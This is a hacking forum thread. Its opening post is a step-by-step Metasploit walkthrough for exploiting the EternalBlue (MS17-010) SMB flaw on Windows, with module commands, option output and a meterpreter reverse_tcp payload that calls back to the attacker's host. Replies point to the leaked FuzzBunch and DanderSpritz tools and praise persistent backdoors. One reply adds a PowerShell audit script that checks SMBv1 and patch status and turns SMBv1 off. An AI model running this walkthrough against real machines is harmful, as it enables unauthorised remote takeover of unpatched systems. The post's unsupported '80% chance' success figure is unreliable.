How To Exploit Using the EternalBlue NSA Exploit

Greetings hackers. My English is quite bad, so correct me if I am wrong, because we learn from our mistakes. So let's begin.

EternalBlue is an exploit most likely developed by the NSA as a former zero-day. It was released in 2017 by the Shadow Brokers, a hacker group known for leaking tools and exploits used by the Equation Group, which has possible ties to the Tailored Access Operations unit of the NSA.

EternalBlue, also known as MS17-010, is a vulnerability in Microsoft’s Server Message Block (SMB) protocol. SMB allows systems to share access to files, printers, and other resources on the network. The vulnerability is allowed to occur because earlier versions of SMB contain a flaw that lets an attacker establish a null session connection via anonymous login. An attacker can then send malformed packets and ultimately execute arbitrary commands on the target.

Step 1
The first thing we need to do is open up the terminal and start Metasploit. Type service postgresql start to initialize the PostgreSQL database, if it is not running already, followed by msfconsole.

Step 2
search eternalblue

It will show something like this:

Matching Modules
================

   Name                                           Disclosure Date  Rank     Check  Description
   ----                                           ---------------  ----     -----  -----------
   auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

There is an auxiliary scanner that we can run to determine if a target is vulnerable to MS17-010.

Step 3

Once we discover that the target is vulnerable to EternalBlue (MS17-010),

we can enter the command
use exploit/windows/smb/ms17_010_eternalblue

Then type show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

Set rhost to the target IP, like 192.168.bla.bla.bla
Set lhost to your IP, bla.bla.bla.blaa.bla
Set lport to any port, like 4444 or 8080
Set processinject explorer.exe
set payload windows/x64/meterpreter/reverse_tcp
Note: do not change rport, leave it as it is, because it works on port 445; if you change rport it won't work.

And last, you have to type exploit

And enjoy your hack [but don't do it for malicious purposes; I am not responsible for that]

If I left something wrong, correct it. Thanks …

We r anonymous
We r legion
Expect us


Just for reference, both of my fully patched Win7 machines show not vulnerable, in case anyone might want to know.
Going to mess with my XP VM though in a little bit and see what happens.

This exploit is patched by Microsoft, but there are many more systems which are not patched, and users are also unaware of these types of exploits, so there is an 80% chance that this type of attack is effective.
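The scanner module in the first post checks a host from the outside; the "fully patched / not patched" remarks above come down to two things you can check from the inside of the Windows box. The following is an added example (not code from anyone in this thread) that audits a host for SMBv1 being enabled and for the MS17-010 update being installed, and then turns SMBv1 off. It assumes KB4012212 and KB4012215 are the March 2017 MS17-010 packages for Windows 7 / Server 2008 R2, that the SMB1 registry value under LanmanServer\Parameters is the Windows 7 switch for SMBv1, and that Get-SmbServerConfiguration is available on Windows 8 / Server 2012 and later; run it in an elevated PowerShell on the host itself.

```powershell
# Added example, not from the thread: local MS17-010 exposure audit.
# Assumptions: KB4012212 / KB4012215 are the MS17-010 packages for
# Windows 7 / Server 2008 R2. Later cumulative rollups supersede them,
# so a missing KB is a hint that the host is unpatched, not proof.

$smb1Enabled = $null
$smbCmdlet = Get-Command Get-SmbServerConfiguration -ErrorAction SilentlyContinue
$lanman = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

if ($smbCmdlet) {
    # Windows 8 / Server 2012 and later expose the setting directly
    $smb1Enabled = (Get-SmbServerConfiguration).EnableSMB1Protocol
} else {
    # Windows 7 / Server 2008 R2: the SMB1 value is absent by default,
    # and absent means SMBv1 is enabled
    $value = (Get-ItemProperty -Path $lanman -ErrorAction SilentlyContinue).SMB1
    $smb1Enabled = ($null -eq $value) -or ($value -ne 0)
}

$ms17010Kbs = @('KB4012212', 'KB4012215')
$hotfixes   = Get-HotFix
$ms17010    = $hotfixes | Where-Object { $ms17010Kbs -contains $_.HotFixID }
$latest     = $hotfixes | Where-Object { $_.InstalledOn } |
              Sort-Object InstalledOn -Descending | Select-Object -First 1

# Summary a defender can collect from many hosts and compare
[PSCustomObject]@{
    ComputerName   = $env:COMPUTERNAME
    SMB1Enabled    = $smb1Enabled
    MS17010KBFound = [bool]$ms17010
    LastHotFixDate = $latest.InstalledOn
}

# Remediation: disabling SMBv1 on the server side removes the attack
# surface regardless of patch state. Windows 7 needs a reboot afterwards.
if ($smb1Enabled) {
    if ($smbCmdlet) {
        Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    } else {
        Set-ItemProperty -Path $lanman -Name SMB1 -Type DWORD -Value 0 -Force
    }
}
```

Note that the KB check only catches the original March 2017 packages; a host that took a later monthly rollup will show MS17010KBFound as false while still being patched, which is why the SMBv1 state and the date of the newest hotfix are reported alongside it.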

I found out this isn't the actual correct way to do it; every time it seems to vary.

Sometimes the scanner for it is even wrong.

Another way to use the EternalBlue exploit is through FuzzBunch and DanderSpritz, the two programs designed and developed by the NSA that were leaked as part of the Shadow Brokers dumps. Both can be found on GitHub.
The installation process is described here: ShadowBrokers Leak

FuzzBunch leverages the EternalBlue exploit, while DanderSpritz has a plethora of post-exploitation modules used once the EternalBlue backdoor has been installed on a system.

Was the Anonymous catchphrase at the end a joke, or are you being fr? lol

This is the reason to use Metasploit.
There is no need to install a backdoor.
It checks to see if the target is vulnerable and proceeds from there.
Much quicker and easier.

In my opinion, I see no reason to use anything else for this exploit.


Yes, Metasploit is great. They have a great scan auxiliary and exploit module for the Eternal flavors.

Of course, I should have said that there is nothing wrong with learning different methods (the right thing to do, I would say); the more you know, the better.

Yes, Metasploit is quicker, but having a persistent backdoor installed is quite useful. Besides the fact that if you use DanderSpritz with FuzzBunch, there are some other really useful tools that you can incorporate.

Makes sense, and your point is very valid.
Besides, learning different methods is a smart thing to do.